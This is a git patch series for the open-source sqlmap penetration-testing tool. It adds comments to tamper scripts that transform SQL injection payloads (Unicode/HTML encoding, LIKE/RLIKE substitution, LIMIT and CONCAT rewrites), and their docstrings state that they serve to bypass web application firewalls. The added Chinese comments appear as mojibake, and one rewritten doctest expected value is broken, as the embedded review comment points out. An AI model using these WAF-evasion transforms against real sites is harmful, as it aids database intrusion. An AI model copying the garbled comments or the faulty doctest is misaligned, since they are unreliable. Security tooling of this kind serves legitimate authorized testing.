杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃Unicode-URL缂栫爜鎵鏈夊瓧绗︼紙涓嶅鐞嗗凡缁忕紪鐮佺殑瀛楃锛夈 + + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + - 灏嗚緭鍏ョ殑payload涓殑瀛楃杞崲涓篣nicode-URL缂栫爜鏍煎紡锛堜緥濡傦紝'SELECT'杞崲涓'%u0053%u0045%u004C%u0045%u0043%u0054'锛夈 - Requirement: - * ASP - * ASP.NET + 瑕佹眰锛 + * 浠呴傜敤浜嶢SP鍜孉SP.NET鐜銆 - Tested against: + 娴嬭瘯鎯呭喌锛 * Microsoft SQL Server 2000 * Microsoft SQL Server 2005 * MySQL 5.1.56 * PostgreSQL 9.0.3 - Notes: - * Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺鍦ㄥ鐞嗚姹傚墠涓嶈繘琛孶nicode URL瑙g爜鐨勫急Web搴旂敤闃茬伀澧欏緢鏈夌敤銆 - >>> tamper('SELECT FIELD%20FROM TABLE') - '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' + 绀轰緥锛 + >>> tamper('SELECT FIELD%20FROM TABLE') + '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload - if payload: - retVal = "" 
- i = 0 + if payload: # 濡傛灉payload涓嶄负绌 + retVal = "" # 鍒濆鍖栬繑鍥炲煎瓧绗︿覆 + i = 0 # 鍒濆鍖栫储寮 + # 閬嶅巻payload涓殑姣忎釜瀛楃 while i < len(payload): + # 濡傛灉褰撳墠瀛楃鏄%涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛堝凡缂栫爜鐨勫瓧绗︼級锛屽垯杩涜Unicode-URL缂栫爜 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += "%%u00%s" % payload[i + 1:i + 3] i += 3 else: + # 瀵规湭缂栫爜鐨勫瓧绗﹁繘琛孶nicode-URL缂栫爜锛屽苟娣诲姞鍒拌繑鍥炲 retVal += '%%u%.4X' % ord(payload[i]) i += 1 diff --git a/src/sqlmap-master/tamper/charunicodeescape.py b/src/sqlmap-master/tamper/charunicodeescape.py index 8fe05c0..41d47a6 100644 --- a/src/sqlmap-master/tamper/charunicodeescape.py +++ b/src/sqlmap-master/tamper/charunicodeescape.py 
@@ -5,35 +5,48 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import string +import string # 瀵煎叆瀛楃涓插父閲忓簱锛岀敤浜庡鐞嗗瓧绗﹀拰鍗佸叚杩涘埗鏁板瓧 -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏅 __priority__ = PRIORITY.NORMAL def tamper(payload, **kwargs): """ - Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃Unicode杞箟闈炵紪鐮佸瓧绗︼紙涓嶅鐞嗗凡缁忕紪鐮佺殑瀛楃锛夈 - Notes: - * Useful to bypass weak filtering and/or WAFs in JSON contexes + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - >>> tamper('SELECT FIELD FROM TABLE') - '\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045' + 鍔熻兘锛 + - 灏嗚緭鍏ョ殑payload涓殑瀛楃杞崲涓篣nicode杞箟搴忓垪锛堜緥濡傦紝'SELECT'杞崲涓'\u0053\u0045\u004C\u0045\u0043\u0054'锛夈 + + 娉ㄦ剰锛 + * 杩欎釜鏂规硶瀵逛簬缁曡繃鍦↗SON涓婁笅鏂囦腑鐨勫急杩囨护鍜/鎴朩eb搴旂敤闃茬伀澧欙紙WAFs锛夊緢鏈夌敤銆 + + 绀轰緥锛 + >>> tamper('SELECT FIELD FROM TABLE') + '\\u0053\\u0045\\u004C\\u0045\\u0043\\u0054 \\u0020\\u0046\\u0049\\u0045\\u004C\\u0044 \\u0046\\u0052\\u004F\\u004D \\u0054\\u0041\\u0042\\u004C\\u0045' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload + - if payload: - retVal = "" - i = 0 + if payload: # 濡傛灉payload涓嶄负绌 + retVal = "" # 鍒濆鍖栬繑鍥炲煎瓧绗︿覆 + i = 0 # 鍒濆鍖栫储寮 + # 閬嶅巻payload涓殑姣忎釜瀛楃 while i < len(payload): + # 濡傛灉褰撳墠瀛楃鏄%涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛堝凡缂栫爜鐨勫瓧绗︼級锛屽垯杩涜Unicode杞箟 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += "\\u00%s" % payload[i + 1:i + 3] i += 3 else: + # 瀵规湭缂栫爜鐨勫瓧绗﹁繘琛孶nicode杞箟锛屽苟娣诲姞鍒拌繑鍥炲 retVal += '\\u%.4X' % ord(payload[i]) - i += 1 + i += 1 # 绉诲姩绱㈠紩锛屽鐞嗕笅涓涓瓧绗 return retVal 
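Review bot: The doctest expected value in the new docstring no longer matches what `tamper()` returns. It is written with single backslashes (`'\\u0053\\u0045…'`), which the non-raw docstring turns into `\u0053…` while doctest compares against the repr of the result, where each backslash appears doubled; and it inserts literal spaces (`…\\u0054 \\u0020\\u0046…`) that the loop never emits, because every character including the space goes through `'\\u%.4X' % ord(payload[i])`. The removed line had the correct form; restore it as `'\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046…'` with no spaces between groups. If the project's doctest-based smoke test runs tamper docstrings, this hunk as written would fail it.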
From ef5f6eee11b29f232ba5e3951e1fe60266c0ca4a Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Mon, 30 Dec 2024 10:25:22 +0800 Subject: [PATCH 6/9] sck --- src/sqlmap-master/tamper/commalesslimit.py | 42 +++++++---- src/sqlmap-master/tamper/commalessmid.py | 31 +++++--- .../tamper/commentbeforeparentheses.py | 7 +- src/sqlmap-master/tamper/concat2concatws.py | 32 ++++---- src/sqlmap-master/tamper/decentities.py | 27 +++++-- src/sqlmap-master/tamper/dunion.py | 32 ++++---- src/sqlmap-master/tamper/equaltolike.py | 33 +++++---- src/sqlmap-master/tamper/equaltorlike.py | 29 +++++--- src/sqlmap-master/tamper/escapequotes.py | 18 ++++- src/sqlmap-master/tamper/greatest.py | 37 ++++++---- .../tamper/halfversionedmorekeywords.py | 44 ++++++----- src/sqlmap-master/tamper/hex2char.py | 43 ++++++----- src/sqlmap-master/tamper/hexentities.py | 22 ++++-- src/sqlmap-master/tamper/htmlencode.py | 25 +++++-- src/sqlmap-master/tamper/if2case.py | 73 ++++++++++--------- .../tamper/ifnull2casewhenisnull.py | 36 +++++---- 16 files changed, 329 insertions(+), 202 deletions(-) diff --git a/src/sqlmap-master/tamper/commalesslimit.py b/src/sqlmap-master/tamper/commalesslimit.py index 0561b2f..c5a5799 100644 --- a/src/sqlmap-master/tamper/commalesslimit.py +++ b/src/sqlmap-master/tamper/commalesslimit.py @@ -5,13 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import os -import re +import os # 瀵煎叆鎿嶄綔绯荤粺鎺ュ彛妯″潡 +import re # 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧 -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage # 浠庢牳蹇冨簱瀵煎叆鍗曟璀﹀憡娑堟伅鍑芥暟 +from lib.core.enums import DBMS # 浠庢牳蹇冨簱瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负楂 __priority__ = PRIORITY.HIGH def dependencies(): 
@@ -19,22 +20,33 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢MySQL涓殑'LIMIT M, N'璇彞鏇挎崲涓哄叾绛夋晥鐨'LIMIT N OFFSET M'褰㈠紡銆 - Requirement: - * MySQL + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Tested against: - * MySQL 5.0 and 5.5 + 瑕佹眰锛 + * 浠呴傜敤浜嶮ySQL鏁版嵁搴撱 - >>> tamper('LIMIT 2, 3') - 'LIMIT 3 OFFSET 2' + 娴嬭瘯鎯呭喌锛 + * MySQL 5.0 鍜 5.5 + + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃鏌愪簺閽堝'LIMIT M, N'褰㈠紡鐨勯槻寰℃満鍒跺緢鏈夌敤銆 + + 绀轰緥锛 + >>> tamper('LIMIT 2, 3') + 'LIMIT 3 OFFSET 2' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload + + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵'LIMIT M, N'褰㈠紡鐨勮鍙 match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "") - if match: + if match: # 濡傛灉鎵惧埌鍖归厤椤 + # 鏇挎崲涓'LIMIT N OFFSET M'褰㈠紡 retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1))) - return retVal + return retVal # 杩斿洖绡℃敼鍚庣殑payload diff --git a/src/sqlmap-master/tamper/commalessmid.py b/src/sqlmap-master/tamper/commalessmid.py index b6f4e7f..d8c368b 100644 --- a/src/sqlmap-master/tamper/commalessmid.py +++ b/src/sqlmap-master/tamper/commalessmid.py 
@@ -19,26 +19,37 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢MySQL涓殑'MID(A, B, C)'璇彞鏇挎崲涓哄叾绛夋晥鐨'MID(A FROM B FOR C)'褰㈠紡銆 - Requirement: - * MySQL + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Tested against: - * MySQL 5.0 and 5.5 + 瑕佹眰锛 + * 浠呴傜敤浜嶮ySQL鏁版嵁搴撱 - >>> tamper('MID(VERSION(), 1, 1)') - 'MID(VERSION() FROM 1 FOR 1)' + 娴嬭瘯鎯呭喌锛 + * MySQL 5.0 鍜 5.5 + + 娉ㄦ剰锛 + * 浣跨敤杩欎釜tamper鑴氭湰鏃讹紝浣犲彲鑳介渶瑕佽冭檻浣跨敤'--no-cast'閫夐」锛屼互閬垮厤绫诲瀷杞崲闂銆 + + 绀轰緥锛 + >>> tamper('MID(VERSION(), 1, 1)') + 'MID(VERSION() FROM 1 FOR 1)' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload + # 鏋勫缓璀﹀憡淇℃伅锛屾彁绀虹敤鎴峰彲鑳介渶瑕佷娇鐢'--no-cast'閫夐」 warnMsg = "you should consider usage of switch '--no-cast' along with " warnMsg += "tamper script '%s'" % os.path.basename(__file__).split(".")[0] singleTimeWarnMessage(warnMsg) + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵'MID(A, B, C)'褰㈠紡鐨勮鍙 match = re.search(r"(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)", payload or "") - if match: + if match: # 濡傛灉鎵惧埌鍖归厤椤 + # 鏇挎崲涓'MID(A FROM B FOR C)'褰㈠紡 retVal = retVal.replace(match.group(0), "MID(%s FROM %s FOR %s)" % (match.group(1), match.group(2), match.group(3))) - return retVal + return retVal # 杩斿洖绡℃敼鍚庣殑payload diff --git a/src/sqlmap-master/tamper/commentbeforeparentheses.py b/src/sqlmap-master/tamper/commentbeforeparentheses.py index d5e471d..b4d4162 100644 --- a/src/sqlmap-master/tamper/commentbeforeparentheses.py +++ b/src/sqlmap-master/tamper/commentbeforeparentheses.py @@ -5,11 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import re +import re # 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧 from lib.core.enums import PRIORITY -__priority__ = PRIORITY.NORMAL +__priority__ = PRIORITY.NORMAL # 璁剧疆浼樺厛绾т负鏅 def dependencies(): pass 
@@ -32,9 +32,10 @@ def tamper(payload, **kwargs): 'SELECT ABS/**/(1)' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵惧崟璇嶅悗绱ц窡'('鐨勬ā寮忥紝骞跺湪'('鍓嶆坊鍔犲唴鑱旀敞閲'/**/' retVal = re.sub(r"\b(\w+)\(", r"\g<1>/**/(", retVal) return retVal diff --git a/src/sqlmap-master/tamper/concat2concatws.py b/src/sqlmap-master/tamper/concat2concatws.py index 7c66c88..3fbc8d6 100644 --- a/src/sqlmap-master/tamper/concat2concatws.py +++ b/src/sqlmap-master/tamper/concat2concatws.py @@ -5,12 +5,13 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import os +import os # 瀵煎叆鎿嶄綔绯荤粺妯″潡锛岀敤浜庤幏鍙栨枃浠惰矾寰勭瓑淇℃伅 -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage # 浠庢牳蹇冨簱瀵煎叆鍗曟璀﹀憡娑堟伅鍑芥暟 +from lib.core.enums import DBMS # 浠庢牳蹇冨簱瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): 
@@ -18,23 +19,28 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢MySQL涓殑'CONCAT(A, B)'鍑芥暟鏇挎崲涓哄叾绛夋晥鐨'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'褰㈠紡銆 - Requirement: - * MySQL + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Tested against: + 瑕佹眰锛 + * 浠呴傜敤浜嶮ySQL鏁版嵁搴撱 + + 娴嬭瘯鎯呭喌锛 * MySQL 5.0 - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the CONCAT() function + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护CONCAT()鍑芥暟鐨勯潪甯稿急鐨勫畾鍒禬eb搴旂敤闃茬伀澧欏緢鏈夌敤銆 - >>> tamper('CONCAT(1,2)') - 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' + 绀轰緥锛 + >>> tamper('CONCAT(1,2)') + 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' """ if payload: + # 灏唒ayload涓殑'CONCAT('鏇挎崲涓'CONCAT_WS(MID(CHAR(0),0,0),' payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),") return payload diff --git a/src/sqlmap-master/tamper/decentities.py b/src/sqlmap-master/tamper/decentities.py index aaed22f..7457579 100644 --- a/src/sqlmap-master/tamper/decentities.py +++ b/src/sqlmap-master/tamper/decentities.py @@ -5,8 +5,9 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负浣 __priority__ = PRIORITY.LOW def dependencies(): 
@@ -14,19 +15,29 @@ def dependencies(): def tamper(payload, **kwargs): """ - HTML encode in decimal (using code points) all characters (e.g. ' -> ') + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鎵鏈夊瓧绗﹁浆鎹负HTML瀹炰綋锛堜娇鐢ㄥ崄杩涘埗浠g爜鐐癸級銆 - >>> tamper("1' AND SLEEP(5)#") - '1' AND SLEEP(5)#' + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + - 閬嶅巻payload涓殑姣忎釜瀛楃锛屽苟灏嗘瘡涓瓧绗﹁浆鎹负鍏跺搴旂殑HTML瀹炰綋褰㈠紡锛堜緥濡傦紝' -> '锛夈 + + 绀轰緥锛 + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload - if payload: - retVal = "" - i = 0 + if payload: # 濡傛灉payload涓嶄负绌 + retVal = "" # 鍒濆鍖栬繑鍥炲煎瓧绗︿覆 + i = 0 # 鍒濆鍖栫储寮 + # 閬嶅巻payload涓殑姣忎釜瀛楃 while i < len(payload): + # 灏嗗綋鍓嶅瓧绗﹁浆鎹负鍏跺搴旂殑HTML瀹炰綋褰㈠紡锛屽苟娣诲姞鍒拌繑鍥炲煎瓧绗︿覆 retVal += "&#%s;" % ord(payload[i]) i += 1 diff --git a/src/sqlmap-master/tamper/dunion.py b/src/sqlmap-master/tamper/dunion.py index 2717268..58a4607 100644 --- a/src/sqlmap-master/tamper/dunion.py +++ b/src/sqlmap-master/tamper/dunion.py @@ -5,13 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import os -import re +import os # 瀵煎叆鎿嶄綔绯荤粺妯″潡锛岀敤浜庤幏鍙栨枃浠惰矾寰勭瓑淇℃伅 +import re # 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧 -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage # 浠庢牳蹇冨簱瀵煎叆鍗曟璀﹀憡娑堟伅鍑芥暟 +from lib.core.enums import DBMS # 浠庢牳蹇冨簱瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): 
@@ -19,16 +20,21 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances of UNION with DUNION + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鍏朵腑鐨'UNION'鍏抽敭瀛楁浛鎹负'DUNION'銆 - Requirement: - * Oracle + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Notes: - * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + 瑕佹眰锛 + * 浠呴傜敤浜嶰racle鏁版嵁搴撱 - >>> tamper('1 UNION ALL SELECT') - '1DUNION ALL SELECT' - """ + 娉ㄦ剰锛 + * 鍙傝冩枃妗o細https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + 绀轰緥锛 + >>> tamper('1 UNION ALL SELECT') + '1DUNION ALL SELECT' + """ + # 濡傛灉payload涓嶄负绌猴紝浣跨敤姝e垯琛ㄨ揪寮忔浛鎹㈠叾涓殑UNION鍏抽敭瀛 return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>D\g<2>", payload) if payload else payload diff --git a/src/sqlmap-master/tamper/equaltolike.py b/src/sqlmap-master/tamper/equaltolike.py index ddc237b..6f77ef4 100644 --- a/src/sqlmap-master/tamper/equaltolike.py +++ b/src/sqlmap-master/tamper/equaltolike.py @@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission import re -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): 
@@ -16,25 +17,29 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鎵鏈夌殑绛夊彿锛'='锛夋搷浣滅鏇挎崲涓'LIKE'鎿嶄綔绗︺ - Tested against: + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 娴嬭瘯鎯呭喌锛 * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 + * MySQL 4, 5.0 鍜 5.5 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the equal character ('=') - * The LIKE operator is SQL standard. Hence, this tamper script - should work against all (?) databases + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护绛夊彿锛'='锛夊瓧绗︾殑寮盬eb搴旂敤闃茬伀澧欏緢鏈夌敤銆 + * LIKE鎿嶄綔绗︽槸SQL鏍囧噯鎿嶄綔绗︼紝鍥犳杩欎釜tamper鑴氭湰搴旇閫傜敤浜庢墍鏈夋暟鎹簱銆 - >>> tamper('SELECT * FROM users WHERE id=1') - 'SELECT * FROM users WHERE id LIKE 1' + 绀轰緥锛 + >>> tamper('SELECT * FROM users WHERE id=1') + 'SELECT * FROM users WHERE id LIKE 1' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload + - if payload: - retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) + if payload: # 濡傛灉payload涓嶄负绌 + retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) # 浣跨敤姝e垯琛ㄨ揪寮忔浛鎹ayload涓殑绛夊彿锛'='锛変负'LIKE' return retVal diff --git a/src/sqlmap-master/tamper/equaltorlike.py b/src/sqlmap-master/tamper/equaltorlike.py index 097adfc..3e8efb8 100644 --- a/src/sqlmap-master/tamper/equaltorlike.py +++ b/src/sqlmap-master/tamper/equaltorlike.py @@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission import re -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): 
@@ -16,22 +17,30 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鎵鏈夌殑绛夊彿锛'='锛夋搷浣滅鏇挎崲涓'RLIKE'鎿嶄綔绗︺ - Tested against: - * MySQL 4, 5.0 and 5.5 + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the equal character ('=') + 娴嬭瘯鎯呭喌锛 + * MySQL 4, 5.0 鍜 5.5 - >>> tamper('SELECT * FROM users WHERE id=1') - 'SELECT * FROM users WHERE id RLIKE 1' + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护绛夊彿锛'='锛夊瓧绗︾殑寮盬eb搴旂敤闃茬伀澧欏緢鏈夌敤銆 + + 绀轰緥锛 + >>> tamper('SELECT * FROM users WHERE id=1') + 'SELECT * FROM users WHERE id RLIKE 1' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔浛鎹ayload涓殑绛夊彿锛'='锛変负'RLIKE' + # \s* 鍖归厤浠绘剰鏁伴噺鐨勭┖鐧藉瓧绗︼紙鍖呮嫭0涓級 + # = 鍖归厤绛夊彿瀛楃 + # \s* 鍖归厤绛夊彿鍚庣殑浠绘剰鏁伴噺鐨勭┖鐧藉瓧绗 retVal = re.sub(r"\s*=\s*", " RLIKE ", retVal) return retVal diff --git a/src/sqlmap-master/tamper/escapequotes.py b/src/sqlmap-master/tamper/escapequotes.py index 778b693..f29e8e7 100644 --- a/src/sqlmap-master/tamper/escapequotes.py +++ b/src/sqlmap-master/tamper/escapequotes.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY +# 璁剧疆浼樺厛绾т负鏅 __priority__ = PRIORITY.NORMAL def dependencies(): @@ -14,10 +15,19 @@ def dependencies(): def tamper(payload, **kwargs): """ - Slash escape single and double quotes (e.g. ' -> \') + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛岄氳繃鏂滄潬杞箟鍗曞紩鍙峰拰鍙屽紩鍙枫 - >>> tamper('1" AND SLEEP(5)#') - '1\\\\" AND SLEEP(5)#' - """ + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + - 灏唒ayload涓殑鍗曞紩鍙凤紙'锛夋浛鎹负杞箟褰㈠紡锛圽\'锛夈 + - 灏唒ayload涓殑鍙屽紩鍙凤紙"锛夋浛鎹负杞箟褰㈠紡锛圽\"锛夈 + 绀轰緥锛 + >>> tamper('1" AND SLEEP(5)#') + '1\\\\" AND SLEEP(5)#' + """ + # 鏇挎崲payload涓殑鍗曞紩鍙峰拰鍙屽紩鍙蜂负瀹冧滑鐨勮浆涔夊舰寮 return payload.replace("'", "\\'").replace('"', '\\"') 
diff --git a/src/sqlmap-master/tamper/greatest.py b/src/sqlmap-master/tamper/greatest.py index 5801355..cb9a15b 100644 --- a/src/sqlmap-master/tamper/greatest.py +++ b/src/sqlmap-master/tamper/greatest.py @@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission import re -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -16,30 +17,36 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'GREATEST' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢澶т簬鎿嶄綔绗︼紙'>')鏇挎崲涓'GREATEST'鍑芥暟鐨勭瓑鏁堝舰寮忋 - Tested against: - * MySQL 4, 5.0 and 5.5 + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + 